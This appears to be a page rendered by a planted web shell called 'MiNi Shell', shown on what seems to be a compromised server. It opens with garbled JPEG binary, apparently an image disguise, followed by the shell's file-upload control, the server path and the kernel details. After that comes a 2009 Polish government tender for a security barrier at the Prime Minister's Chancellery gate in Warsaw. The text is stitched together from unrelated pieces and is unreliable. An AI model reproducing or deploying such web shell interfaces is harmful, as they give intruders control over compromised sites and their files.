JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090310/56312-N-2009.html

<p class="kh_header"><b>Warszawa: Wykonanie zabezpieczenia bramy wjazdowej na teren Kancelarii Prezesa Rady Ministrów w Warszawie, Al. Ujazdowskie 1/3</b><br>
<b>Numer ogłoszenia: 56312 - 2009; data zamieszczenia: 10.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Obsługi Kancelarii Prezesa Rady Ministrów , ul. Powsińska 69/71, 02-903 Warszawa, woj. mazowieckie, tel. 022 6946043,6947628, faks 022 6946043, 6947204,6949645.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> cokprm.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gospodarstwo pomocnicze.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie zabezpieczenia bramy wjazdowej na teren Kancelarii Prezesa Rady Ministrów w Warszawie, Al. Ujazdowskie 1/3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych i instalacyjnych  związanych z zabezpieczeniem bramy wjazdowej na teren Kancelarii Prezesa Rady Ministrów od strony Alej Ujazdowskich, na podstawie projektu będącego w posiadaniu Zamawiającego. Teren KPRM jest wpisany do rejestru zabytków pod nr 1597. Zakres robót:1.	Dostawa i montaż urządzenia ( zapory drogowej), zabezpieczającego drogę wjazdową na teren Kancelarii.Aktywowane zabezpieczenie powinno wytrzymać energię rozbicia nie mniejszą niż 2500 kJ, obciążenie dynamiczne na poziomie 1250 kN, przy szerokości drogi 6 m. Urządzenie powinno otwierać się (do pełnego otwarcia) z szybkością od 2 do 4 sekund oraz posiadać napęd ręczny pozwalający na obsługę w przypadku braku zasilania2.	Wykonanie towarzyszących robót budowlanych i instalacyjnych tj :-	wygrodzenie i oznakowanie terenu budowy,-	rozbiórka nawierzchni i podbudowy,-	wykopy fundamentowe,-	przebudowa infrastruktury podziemnej,-	wykonanie płyt fundamentowych pod skrzynie zapór i fundamenty szafek sterowniczych,-	ułożenie linii kablowej zasilania elektrycznego do szafek zasilająco-sterowniczych,-	ułożenie kabli sterowniczych od szafek do budek wartowniczych,-	ułożenie kabli sterowniczych od szafek do pomieszczenia oficera dyżurnego (częściowo w kanalizacji teletechnicznej a częściowo w budynku)-	ułożenie rur instalacji hydraulicznej od szafek sterowniczych do urządzeń-	podłączenie urządzeń do odwodnienia terenu-	zabetonowanie urządzeń w skrzyni fundamentowej,-	zasypanie wykopu, zagęszczenie gruntu, odtworzenie podbudowy i nawierzchni-	badania, pomiary i próby montażoweWykonawca wykona również wszelkie roboty towarzyszące, tymczasowe, porządkowe i zabezpieczające, niezbędne do prawidłowej realizacji przedmiotu zamówienia i funkcjonowania obiektu, w tym zaplecza budowy.Wykonawca udzieli gwarancji i rękojmi na urządzenie oraz roboty budowlane wraz z materiałami użytymi do tych robót na okres  min. 24 miesięcy - bieg terminu gwarancji i rękojmi rozpoczyna się od dnia odbioru końcowego robót budowlano-montażowo-instalacyjnych, potwierdzonego protokółem odbioru końcowego.Przed terminem składania ofert do niniejszego postępowania dla wykonawców, którzy zostaną zaproszeni do składania ofert zostanie zorganizowana wizja lokalna celem umożliwienia uzyskania wszelkich informacji dotyczących przedmiotu zamówienia. Zamawiający  zaleca wykonawcom wzięcie udziału w wizji, gdyż uważa ją za niezbędną dla kompleksowego sporządzenia ofert..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.80-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy, tj.:       1.1. posiadają uprawnienia do wykonywania działalności będącej przedmiotem zamówienia;       1.2. posiadają niezbędną wiedzę i doświadczenie:Wykonawca zobowiązany jest wykazać, że w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał roboty budowlano-montażowe w zakresie posadowienia co najmniej trzech zapór drogowych o wartości co najmniej 200 000 PLN każda robota;       1.3. dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia:              Wykonawca zobowiązany jest wykazać, że dysponuje lub będzie dysponował:               1.3.1. kierownikiem budowy, który posiada uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności  konstrukcyjno-budowlanej i posiada kwalifikacje do nadzorowania i kierowania robotami budowlanymi przy zabytkach nieruchomych oraz odbył co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych,1.3.2.  kierownikiem robót sanitarnych, który posiada uprawnienia budowlane bez ograniczeń do kierowania  robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń wodociągowych i kanalizacyjnych,                1.3.3. kierownikiem robót elektrycznych, który posiada uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych;       1.4. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.Wykonawca zobowiązany jest wykazać, że posiada polisę, a w przypadku jej braku innego dokumentu potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę co najmniej 200 000 PLN;       1.5. nie podlegają wykluczeniu z postępowania.2.	Zamawiający dokona oceny spełnienia warunków wymaganych od Wykonawców wg formuły spełnia - nie spełnia na podstawie dokumentów złożonych wraz z ofertą.Zamawiający przyzna po 1 punkcie za każdą wykazaną robotę budowlano-montażową w zakresie posadowienia zapór drogowych. Zamawiający spośród wykonawców, którzy spełniają wszystkie warunki udziału w postępowaniu wyłoni 5 wykonawców, którzy wykażą największą ilość robót budowlano-montażowych w zakresie posadowienia zapór drogowych. W przypadku wykazania przez wykonawców takiej samej ilości robót budowlano-montażowych zamawiający wyłoni 5 i każdego następnego wykonawcę, który wykazał taką samą ilość robót jak ostatni zakwalifikowany.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Na potwierdzenie spełnienia warunków udziału w postępowaniu wykonawca złoży, wraz z wnioskiem o dopuszczenie do udziału w przetargu ograniczonym (wzór wniosku znajduje się na stronie internetowej cokprm.gov.pl przy ogłoszeniu o zamówieniu), niżej wymienione dokumenty:     1.1. oryginał oświadczenia o nie podleganiu wykluczeniu z postępowania zgodnie z art. 22 ust. 1 pkt 4 ustawy (wzór oświadczenia znajduje się na stronie internetowej cokprm.gov.pl przy ogłoszeniu o zamówieniu);     1.2. wykaz wykonanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, robót budowlano-montażowych w zakresie posadowienia co najmniej 3 zapór drogowych o wartości co najmniej 200 000 PLN każda robota, z podaniem opisu robót, dat i miejsc wykonania, ich wartości (wzór wykazu znajduje się na stronie internetowej cokprm.gov.pl przy ogłoszeniu o zamówieniu). Do wykazu należy załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie. Wykonawca nie może być wystawcą dokumentów potwierdzających należyte wykonanie zamówienia;      1.3. wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności (wzór wykazu znajduje się na stronie internetowej cokprm.gov.pl przy ogłoszeniu o zamówieniu);      1.4. pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 1.3, Wykonawca wskazał osoby, którymi będzie dysponował;      1.5. dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, zgodnie z art. 12 ust. 7 w związku z art. 88a ust. 1 pkt. 3 lit. a) ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. nr 156 poz. 1118 ze zm.) oraz zgodnie z § 7 lub § 13 Rozporządzenia Ministra Kultury z 9.06.2004 r, w sprawie prowadzenia prac konserwatorskich,  restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych (Dz. U. z 2004 r. Nr 150, poz. 1579):                 1.5.1 dla osób, które uzyskały uprawnienia budowlane przed 1995 rokiem są to uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnej funkcji technicznej w budownictwie, lub zaświadczenie o wpisie lub decyzja o wpisie do centralnego rejestru osób posiadających uprawnienia budowlane, prowadzonego przez Głównego Inspektora Nadzoru Budowlanego;                 1.5.2. dla osób, które uzyskały uprawnienia budowlane po 1995 roku są to zaświadczenie o wpisie lub decyzja o wpisie do centralnego rejestru osób posiadających uprawnienia budowlane, prowadzonego przez Głównego Inspektora Nadzoru Budowlanego;                1.5.3. aktualne na dzień składania wniosków zaświadczenia o wpisie na listę członków właściwej izby samorządu zawodowego;1.5.4.	dla kierownika budowy - zaświadczenie konserwatora zabytków o kwalifikacjach do nadzorowania i kierowania robotami budowlanymi przy zabytkach nieruchomych lub udokumentowaną co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych (dokument wystawiony przez ówczesnego pracodawcę);      1.6. polisę, a w przypadku jej braku innego dokumentu potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności      1.7. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków.2.	Zasady udziału w postępowaniu Wykonawców występujących wspólnie.       2.1. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.       2.2. Wykonawcy, o których mowa w pkt 2.1., składają jeden wniosek, przy czym:              2.2.1. wymagane oświadczenia i dokumenty wskazane w ust. 1 pkt 1.1 oraz 1.7 składa osobno każdy z Wykonawców,2.2.2.	pozostałe oświadczenia i dokumenty wskazane w ust. 1 składa przynajmniej jeden Wykonawca, który spełnia warunki lub Wykonawcy wspólnie.3.	Wykonawcy zagraniczni (mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej) zamiast dokumentu wskazanego w ust. 1 pk. 1.7 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się ww. dokumentów Wykonawca składa dokument zawierający oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów.4.	Forma oświadczeń lub dokumentów4.1.  Wymagane oświadczenia i dokumenty powinny być złożone w formie oryginału lub kopii potwierdzonej za zgodność z oryginałem przez osobę uprawnioną do reprezentowania Wykonawcy (z wyłączeniem: oświadczenia o spełnieniu warunków udziału w postępowaniu, które musi być złożone w oryginale oraz  pełnomocnictwa, o którym mowa poniżej).4.2.  Za osoby uprawnione do reprezentowania Wykonawcy uznaje się osoby upoważnione do reprezentowania Wykonawcy wskazane we właściwym rejestrze lub ewidencji działalności gospodarczej, bądź w stosownym pełnomocnictwie, które należy załączyć do oferty w oryginale lub kopii poświadczonej notarialnie.4.3.	W przypadku, gdy załączone do oferty oświadczenia i dokumenty zostały sporządzone w języku obcym (w tym dokumenty składane przez Wykonawcę zagranicznego) Zamawiający wymaga przedstawienia ich tłumaczenia na język polski poświadczonego przez Wykonawcę. 4.4.	Jeżeli złożone kserokopie oświadczeń i dokumentów wskazanych w ust. 1 do 3 będą nieczytelne lub będą budzić wątpliwości co do ich prawdziwości, Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg ograniczony.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 5.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ zostanie przekazana wykonawcom zaproszonym do składania ofert.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2009 godzina 11:00, miejsce: CENTRUM OBSUGI KANCELARII PREZESA RADY MINISTRÓW, ul. Powsińska 69/71, 02-903 Warszawa, pok. 303.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com